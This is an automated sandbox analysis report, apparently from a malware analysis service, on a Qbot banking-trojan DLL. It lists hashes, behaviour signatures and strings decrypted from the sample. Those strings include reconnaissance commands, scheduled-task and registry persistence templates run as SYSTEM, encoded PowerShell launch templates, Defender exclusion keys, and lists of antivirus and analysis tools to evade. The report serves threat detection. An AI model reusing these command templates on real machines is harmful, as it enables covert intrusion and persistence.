Windows Analysis Report
A290.dll

Overview

General Information

Sample Name: A290.dll
Analysis ID: 878697
MD5: 061a8b23a85b75400cd719fd173767c3
SHA1: 05a7ee8edfb504be3cb6c4e5230fc3994586bf1e
SHA256: 6615dda3718170a2c4946ebf0a62ad4f36b707c1d984011f866ff56dd2c3cc24
Tags: dll, qbot

Detection

Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Antivirus / Scanner detection for submitted sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign process
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Potentially malicious time measurement code found
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file name is different from the original file name gathered from version info
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Name: QakBot, qbot
Description: QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and as a loader that uses C2 servers for payload targeting and download.
Attribution: GOLD CABIN
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

AV Detection

Source: 00000014.00000002.561029904.00000000005DA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685433861", "Version": "404.1320", "C2 list": [...]}
Source: A290.dll Avira: detected
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: error res='%s' err=%d len=%u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: netstat -nao
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: runas
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ipconfig /all
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: net localgroup
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: nltest /domain_trusts /all_trusts
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Microsoft
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELF_TEST_1
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: p%08x
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self test FAILED!!!
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self test OK.
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: /t5
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: whoami /all
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: route print
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .lnk
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: arp -a
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s "$%s = \"%s\"; & $%s"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: net share
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd.exe /c set
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self check
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %u;%u;%u;
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ProfileImagePath
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: at.exe %u:%u "%s" /I
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ProgramData
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Self check ok!
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: powershell.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: qwinsta
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: net view
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Component_08
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Start screenshot
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: schtasks.exe /Delete /F /TN %u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: appidapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\ProgramData
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Component_07
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: powershell.exe -encodedCommand %S
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ERROR: GetModuleFileNameW() failed with error: %u
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: powershell.exe -encodedCommand
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SystemRoot
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cscript.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: MBAMService.exe;mbamgui.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: C:\INTERNAL\__empty
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_PhysicalMemory
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ALLUSERSPROFILE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/jpeg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LocalLow
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: displayName
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: shlwapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CommandLine
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: kernel32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SubmitSamplesConsent
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: 1234567890
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wbj.go
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_DiskDrive
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: System32
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Name
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WRSA.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SpyNetReporting
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: FALSE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aswhookx.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Packages
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: application/x-shockwave-flash
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: RepUx.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Winsta0
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: avp.exe;kavtray.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: root\SecurityCenter2
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: MsMpEng.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: userenv.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: csc_ui.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: \\.\pipe\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: pstorec.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: NTUSER.DAT
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: from
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\sethc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: netapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: gdi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: setupapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM Win32_Processor
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: iphlpapi.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Caption
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CrAmTray.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_ComputerSystem
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: user32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: \sf2.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: egui.exe;ekrn.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Software\Microsoft
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %S.%06d
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: bcrypt.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM AntiVirusProduct
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wtsapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: shell32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: TRUE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Bios
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: */*
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ByteFence.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: type=0x%04X
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ROOT\CIMV2
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: https
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: fshoster32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: kernelbase.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: regsvr32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s\system32\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Process
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: rundll32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LOCALAPPDATA
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: APPDATA
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: select
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: mcshield.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: advapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ws2_32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .cfg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Product
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WQL
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wininet.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LastBootUpTime
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: urlmon.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Create
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_PnPEntity
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Initializing database...
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: winsta0\default
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .dat
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WBJ_IGNORE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: next
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wpcap.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/pjpeg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: fmon.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: vbs
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aswhooka.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SysWOW64
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: mpr.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/gif
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: crypt32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ntdll.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: open
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\wextract.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wtsapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: shell32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: TRUE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Bios
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: c:\hiberfil.sysss
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: */*
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ByteFence.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: type=0x%04X
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: snxhk_border_mywnd
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ROOT\CIMV2
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: https
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: fshoster32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: kernelbase.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: regsvr32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %s\system32\
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Process
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: rundll32.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LOCALAPPDATA
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: cmd.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: APPDATA
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: select
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: mcshield.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: advapi32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: ws2_32.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .cfg
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_Product
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WQL
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wininet.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: LastBootUpTime
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: S:(ML;;NW;;;LW)
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: urlmon.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Create
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Win32_PnPEntity
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: Initializing database...
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: winsta0\default
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: .dat
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: WBJ_IGNORE
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: next
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: wpcap.dll
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 20.2.rundll32.exe.ad0000.1.unpack String decryptor: image/pjpeg
